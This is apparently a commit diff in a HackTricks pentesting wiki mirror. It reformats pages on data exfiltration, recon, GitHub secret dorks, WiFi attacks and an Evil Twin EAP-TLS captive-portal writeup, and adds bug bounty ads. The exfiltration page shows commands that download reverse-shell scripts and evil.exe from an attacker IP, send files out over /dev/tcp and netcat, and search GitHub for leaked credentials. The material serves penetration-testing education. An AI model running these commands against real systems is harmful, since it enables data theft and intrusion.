0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3289] No subject

This commit is contained in:
CPol 2022-06-28 10:36:33 +00:00 committed by gitbook-bot
parent 6fe4fd2ace
commit fa0d025cbf
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
5 changed files with 105 additions and 52 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

81
generic-methodologies-and-resources/exfiltration.md
View File

@ -1,4 +1,4 @@
# Exfiltration
<details>
@ -16,26 +16,32 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
# Copy\&Paste Base64
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
### Linux
## Copy\&Paste Base64
#### Linux
```bash
base64 -w0 <file> #Encode file
base64 -d file #Decode file
```
### Windows
#### Windows
```
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
```
# HTTP
## HTTP
### Linux
#### Linux
```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
@ -44,7 +50,7 @@ curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
```
### Windows
#### Windows
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
@ -61,11 +67,11 @@ Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
## Upload files
### Upload files
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
## **HTTPS Server**
### **HTTPS Server**
```python
# from https://gist.github.com/dergachev/7028596
@ -108,23 +114,23 @@ if __name__ == "__main__":
###
```
# FTP
## FTP
## FTP server (python)
### FTP server (python)
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
## FTP server (NodeJS)
### FTP server (NodeJS)
```
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
```
## FTP server (pure-ftp)
### FTP server (pure-ftp)
```bash
apt-get update && apt-get install pure-ftp
@ -144,7 +150,7 @@ chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
## **Windows** client
### **Windows** client
```bash
#Work well with python. With pure-ftp use fusr:ftp
@ -157,7 +163,14 @@ echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
# SMB
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## SMB
Kali as server
@ -168,7 +181,7 @@ kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
impacket-smbserver -smb2support -user test -password test test `pwd`
```
Or create a **smb **share **using samba**:
Or create a \*\*smb \*\*share **using samba**:
```bash
apt-get install samba
@ -195,7 +208,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
WindPS-2> cd new_disk:
```
# SCP
## SCP
The attacker has to have SSHd running.
@ -203,23 +216,23 @@ The attacker has to have SSHd running.
scp <username>@<Attacker_IP>:<directory>/<filename>
```
# NC
## NC
```bash
nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file
```
# /dev/tcp
## /dev/tcp
## Download file from victim
### Download file from victim
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
## Upload file to victim
### Upload file to victim
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
@ -230,7 +243,7 @@ cat <&6 > file.txt
thanks to **@BinaryShadow\_**
# **ICMP**
## **ICMP**
```bash
#In order to exfiltrate the content of a file via pings you can do:
@ -250,7 +263,7 @@ def process_packet(pkt):
sniff(iface="tun0", prn=process_packet)
```
# **SMTP**
## **SMTP**
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
@ -258,7 +271,7 @@ If you can send data to an SMTP server, you can create a SMTP to receive the dat
sudo python -m smtpd -n -c DebuggingServer :25
```
# TFTP
## TFTP
By default in XP and 2003 (in others it need to be explicitly added during installation)
@ -284,7 +297,7 @@ In **victim**, connect to the Kali server:
tftp -i <KALI-IP> get nc.exe
```
# PHP
## PHP
Download a file with a PHP oneliner:
@ -292,13 +305,13 @@ Download a file with a PHP oneliner:
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```
# VBScript
## VBScript
```bash
Attacker> python -m SimpleHTTPServer 80
```
### Victim
#### Victim
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
@ -332,7 +345,7 @@ echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
# Debug.exe
## Debug.exe
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
@ -350,10 +363,16 @@ wine exe2bat.exe nc.exe nc.txt
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
# DNS
## DNS
[https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
<details>
@ -370,5 +389,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

4
generic-methodologies-and-resources/external-recon-methodology/README.md
View File

@ -162,10 +162,12 @@ Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## Subdomains

16
generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md
View File

@ -1,4 +1,4 @@
# Github Leaked Secrets
<details>
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
## Api keys leaks in github
### Api keys leaks in github
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber)
* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
@ -31,7 +37,7 @@ Now that we have built the list of assets of our scope it's time to search for s
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
## **Dorks**
### **Dorks**
```bash
".mlab.com password"
@ -315,8 +321,6 @@ AWS SECRET
"private" extension:pgp
```
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -332,5 +336,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

23
generic-methodologies-and-resources/pentesting-wifi/README.md
View File

@ -18,6 +18,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## Wifi basic commands
```bash
@ -296,6 +303,13 @@ So broken and disappeared that I am not going to talk about it. Just know that _
![](<../../.gitbook/assets/image (125).png>)
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## WPA/WPA2 PSK
### PMKID
@ -794,6 +808,15 @@ This works like an Evil-Twin but for Wi-Fi direct, you can impersonate a group o
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>

33
generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md
View File

@ -1,4 +1,4 @@
# Evil Twin EAP-TLS
<details>
@ -16,16 +16,22 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
At some point I needed to use the proposed solution by the post bellow but the steps in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) wasn't working in modern kali (2019v3) anymore.\
Anyway, it's easy to make them work. \
Anyway, it's easy to make them work.\
You only need to download the hostapd-2.6 from here: [https://w1.fi/releases/](https://w1.fi/releases/) and before compiling again hostapd-wpe install: `apt-get install libssl1.0-dev`
# Evil Twin for EAP-TLS
## Evil Twin for EAP-TLS
**This post was copied from** [**https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/**](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)
## The Uncommon Case: Attacking EAP-TLS
### The Uncommon Case: Attacking EAP-TLS
Earlier I mentioned a less common wireless network configuration that we had to deal with during this project. This scheme is based on EAP-TLS, where the supplicant will have to present a valid client certificate to the authentication server before being granted access to the network.
@ -43,7 +49,7 @@ This means that the supplicant configuration was too lax, and it was accepting a
After seeing this error and searching the Web, we realized it was not that common to exploit this scenario -judging by the lack of information on blogs related to this matter and that we had to deal with it somehow.
## [MiTM Attack Defining the Objective](https://versprite.com/tag/mitm/)
### [MiTM Attack Defining the Objective](https://versprite.com/tag/mitm/)
As you might have guessed already, the idea here is to tweak our tool to make it accept any certificate provided by occasional supplicants to let the victim establish a full connection with our malicious Wireless infrastructure and then [perform a man-in-the-middle attack](https://versprite.com/tag/mitm/) between the victim and the Internet, showing a captive portal to capture plaintext credentials as a first step.
@ -87,21 +93,21 @@ To quickly leverage it, we decided to take the portion of the code from Wifiphis
Now that we have all the elements, lets perform the attack against a victim and see how all this would be from an attacker perspective:
### 1. Lets check the environment with airodump-ng
#### 1. Lets check the environment with airodump-ng
![airodump-ng](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.35.48-PM.png)
From the output, we can identify the access point BSSID (F4:EC:38:FA:E7:57) to which our victim (00:0F:60:07:95:D7) is connected to the WPA2-enterprise network named “enterprise” (ESSID).
### 2. Run the modified hostapd-wpe tool to create a fake AP for the target network
#### 2. Run the modified hostapd-wpe tool to create a fake AP for the target network
![modified modified hostapd-wpe](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.36.29-PM.png)
### 3. Customize the captive portal template (e.g. HTML login) to make it familiar for your target audience (victims) and run it
#### 3. Customize the captive portal template (e.g. HTML login) to make it familiar for your target audience (victims) and run it
![Customize the captive portal](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.37.02-PM.png)
### 4. Perform a de-auth attack and assume the risk (if you are impatient)
#### 4. Perform a de-auth attack and assume the risk (if you are impatient)
![de-auth attack](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.37.36-PM.png)
@ -111,7 +117,7 @@ As a result, we will see on the modified hostapd-wpe tools output the followi
This suggests a victim (00:0f:60:07:95:d7) has connected to our fake AP.
On the victims Windows host, we observe it automatically connected to the fake AP, and as soon as web navigation is tried, the user is presented the captive portal:
On the victims Windows host, we observe it automatically connected to the fake AP, and as soon as web navigation is tried, the user is presented the captive portal:
![captive portal credentials](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.38.54-PM.png)
@ -133,7 +139,12 @@ Although we can read different online articles stating that EAP-TLS is the most
The whole security of this scheme relies, again, on the weakest link in the chain, which might be a device or host configured to accept any certificate presented by the authentication server or a mobile device used by an unconscious user that accepts it without considering the risk of this action.
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
<details>
@ -150,5 +161,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>